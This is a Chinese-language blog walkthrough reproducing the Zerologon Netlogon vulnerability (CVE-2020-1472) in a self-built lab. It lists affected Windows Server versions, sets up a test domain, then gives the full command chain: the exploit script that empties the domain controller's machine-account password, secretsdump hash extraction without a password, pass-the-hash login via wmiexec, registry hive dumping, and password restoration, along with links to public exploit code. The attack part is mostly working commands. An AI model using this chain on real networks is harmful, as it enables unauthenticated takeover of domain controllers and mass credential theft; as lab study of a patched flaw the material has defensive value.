【復現】cve-2020-1472 微軟NetLogon權限提升漏洞 附exp
簡介
近日,監測到國外安全廠商發布了NetLogon權限提升漏洞(CVE-2020-1472)的詳細技術分析文章和驗證腳本。此漏洞是微軟8月份發布安全公告披露的緊急漏洞,漏洞評分10分,漏洞利用后果嚴重,未經身份認證的攻擊者可通過使用 Netlogon 遠程協議(MS-NRPC)連接域控制器來利用此漏洞。成功利用此漏洞的攻擊者可獲得域管理員訪問權限。鑒於該漏洞影響較大,建議客戶盡快安裝軟件更新
影響版本
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
搭建域控
環境:域控windows 2008 Server,成員windows 7(當然不是域內成員,只要能ping通域控即可)
注意:域控制器的IP必須是靜態的)
1、設置Windows Server 2008的IP地址:點擊開始—>右擊網絡—>屬性—>本地連接—>屬性—>去掉IPv6前的對勾—>點擊IPv4—>屬性—>使用下面的IP地址—>將IP地址設為192.168.2.208(注意:這塊IP地址可以根據個人來設置,但是前后要保持一致)—>子網掩碼自動獲取為255.255.255.0—>不設置網關—>使用下面的DNS服務器地址—>設置首選DNS服務器IP地址為192.168.2.208—>不設置備用DNS服務器,設置完成點擊確定。
2、安裝域(在Windows Server 2008下進行)
a:點擊開a始旁邊的按鈕—>點擊添加角色—>下一步—>勾選Active Directory域服務—>安裝—>一直點擊下一步就好了。
b:點擊開始—>在命令行輸入dcpromo—>確定—>下一步—>在新林中創建域—>輸入server08.com—>下一步—>林功能級別(選擇默認或2008都可以根據自己來)—>域功能級別(選擇默認)—>安裝DNS服務器(這個是強制的,也是必須要安裝的,否則無法解析IP地址)—>選擇是—>文件夾不修改(默認)—>密碼設置(這不是登陸密碼))—>下一步—>完成—>重啟(必須重啟設置才能有效)。
這樣就將域安裝好了!
3、設置windows 7的IP地址(將該IP設為192.168.2.100,只要一個C段就行)和DNS服務器(DNS服務器設為192.168.2.208,與域控制器(windows 2008 Server)的IP地址和DNS服務器IP地址相同)
右鍵點擊計算機—>網上鄰居—>本地連接—>屬性—>Internet協議—>屬性—>使用下面的IP地址—>將IP地址設為192.168.2.100—>子網掩碼自動獲取為255.255.255.0—>不設置網關—>使用下面的DNS服務器地址—>設置首選DNS服務器IP地址為192.168.2.208—>不設置備用DNS服務器,設置完成點擊確定。
4、當然可以將win7加入域中,不加也可以,只要能ping通域控即可。所以下面的步驟隨個人。
https://blog.csdn.net/wwl012345/article/details/88934571 ,從【5、更改windows 7的域】開始看即可。
漏洞復現
1.准備python3,此處我使用的是python3.7.5(提示:win7sp1最高好像只能裝到3.7.5,裝python3.8/3.9需要升級,不嫌麻煩的可以試試)。
2.裝好之后,安裝impacket包
pip install impacket #如果之前裝過那么卸載重裝,最新版 pip uninstall impacket
然后將結尾的exp cve-2020-1472.py放入所在位置即可,一般會安裝在,\python37\Scripts\目錄下。(python37為你安裝的python的文件夾的位置)
或者,直接安裝好后不用將exp cve-2020-1472.py拷入,安裝了impacket,直接使用包中的secretsdump.py即可。
3.ping一下域控看是否ping通
注意:安裝了impacket包之后,包中自帶一個ping.py。所以利用系統的ping,需要指定ping.exe,否則ping 會識別成ping.py.
4.利用
python CVE-2020-1472.py AD-SERVER AD-SERVER$ 192.168.2.208
python CVE-2020-1472.py 域控nbios名 域控主機名$ 域控IP
域控名稱前面看博客中有介紹:右鍵我的電腦 -> 右下角更改設置 -> 更改 -> 勾選域,輸入域名,上面添上域控名稱 ->重啟即可。
python secretsdump.py server08.com/AD-Server$@192.168.2.208 -just-dc -no-pass
python secretsdump.py server08.com/AD-Server$@192.168.2.208 -no-pass 導出所有hash
以上兩條都可以。
python secretsdump.py 域名/域控名稱$@域控IP -just-dc -no-pass #-just-dc只導出域控的NTDS.dit數據(NTLM hash和Kerberos hash)-no-pass 不詢問密碼
Server08$用戶hash已被替換為31d6cfe0d16ae931b73c59d7e0c089c0 (空)。
5.使用administrator的hash橫向連接過去
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f Server08/administrator@192.168.2.208
python wmiexec.py -hashes LM:NT DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr
(后續回復密碼沒有試成功,一直輸了命令一直卡在那,就套用大佬的操作,后續有時間再試一下,[捂臉])
6.獲取計算機賬號原始hash
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
7、將該原始計算機帳戶哈希還原
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
python3 reinstall_original_pw.py WIN-2008-DC 192.168.3.123 6493fcc57bd126e9ab8fb9f56e8a79c9
8、查看WIN-2008-DC$賬號的hash,已成功還原
secretsdump.py ggyao.com/administrator:1qaz@WSX@192.168.3.123 -just-dc-user 'WIN-2008-DC$'
exp
https://github.com/Kamimuka/CVE-2020-1472
https://github.com/risksense/zerologon
https://github.com/SecuraBV/CVE-2020-1472
參考鏈接:
域控搭建:https://blog.csdn.net/wwl012345/article/details/88934571
https://jingyan.baidu.com/article/19192ad8e1593ae53e5707be.html
復現:https://mp.weixin.qq.com/s/MSLbzg2hCoTSVTtEIxxpNQ
https://blog.csdn.net/mukami0621/article/details/108605941
https://blog.csdn.net/lhh134/article/details/108630955